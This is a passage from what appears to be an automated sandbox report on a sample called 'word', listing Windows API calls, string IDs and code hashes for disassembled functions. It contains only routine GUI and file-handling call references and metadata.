                                                                            • EnumChildWindows.USER32 ref: 0046DCBC
                                                                            • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                            • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                            • API String ID: 1322021666-1919597938
                                                                            • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                            • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                            • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                            • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$CtrlFocus
                                                                            • String ID: 0$X+
                                                                            • API String ID: 1534620443-479754480
                                                                            • Opcode ID: e2a32ae154a8fa7b81474ae7b3e79c635657a695f15150dcabcd5e036a6f6ddb
                                                                            • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                            • Opcode Fuzzy Hash: e2a32ae154a8fa7b81474ae7b3e79c635657a695f15150dcabcd5e036a6f6ddb
                                                                            • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                            • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                            • __wsplitpath.LIBCMT ref: 0045DF54
                                                                            • _wcscat.LIBCMT ref: 0045DF6C
                                                                            • _wcscat.LIBCMT ref: 0045DF7E
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                            • _wcscpy.LIBCMT ref: 0045E019
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3201719729-438819550
                                                                            • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                            • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                            • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                            • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                            APIs
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                              • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                            • SendMessageW.USER32(?), ref: 0046F34C
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                            • _wcscat.LIBCMT ref: 0046F3BC
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                            • DragFinish.SHELL32(?), ref: 0046F414
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$X+
                                                                            • API String ID: 4085615965-2196474031
                                                                            • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                            • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                            • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                            • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll$IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2485277191-404129466
                                                                            • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                            • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                            • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                            • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                            APIs
                                                                            • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                            • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                            • strncnt.LIBCMT ref: 00428646
                                                                            • strncnt.LIBCMT ref: 0042865A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: strncnt$CompareErrorLastString
                                                                            • String ID:
                                                                            • API String ID: 1776594460-0
                                                                            • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                            • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                            • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                            • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                            APIs
                                                                            • LoadIconW.USER32 ref: 004545DA
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                            • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                            • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                            • GetWindowRect.USER32(?,?), ref: 00454688
                                                                            • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                            • GetDesktopWindow.USER32 ref: 00454708
                                                                            • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                            • GetClientRect.USER32(?,?), ref: 0045476F
                                                                            • PostMessageW.USER32 ref: 0045479E
                                                                            • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                            • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                            • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                            • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$Load$Info
                                                                            • String ID:
                                                                            • API String ID: 2577412497-0
                                                                            • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                            • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                            • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                            • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateDestroy
                                                                            • String ID: ,$X+$tooltips_class32
                                                                            • API String ID: 1109047481-900504714
                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3993528054-4108050209
                                                                            • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                            • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                            • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                            • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll
                                                                            • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                            • API String ID: 3832890014-4202584635
                                                                            • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                            • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                            • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                            • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 004669C4
                                                                            • _wcsncpy.LIBCMT ref: 00466A21
                                                                            • _wcsncpy.LIBCMT ref: 00466A4D
                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                            • _wcstok.LIBCMT ref: 00466A90
                                                                              • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                            • _wcstok.LIBCMT ref: 00466B3F
                                                                            • _wcscpy.LIBCMT ref: 00466BC8
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                            • _wcslen.LIBCMT ref: 00466D1D
                                                                            • _memset.LIBCMT ref: 00466BEE
                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                            • _wcslen.LIBCMT ref: 00466D4B
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                            • String ID: X$HH
                                                                            • API String ID: 3021350936-1944015008
                                                                            • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                            • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                            • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                            • CharNextW.USER32(?), ref: 00449361
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                            • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                            • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CharNext
                                                                            • String ID: X+
                                                                            • API String ID: 1350042424-1938338529
                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                            • String ID: 0
                                                                            • API String ID: 1504565804-4108050209
                                                                            • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                            • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                            APIs
                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                            • String ID: *.*
                                                                            • API String ID: 1153243558-438819550
                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
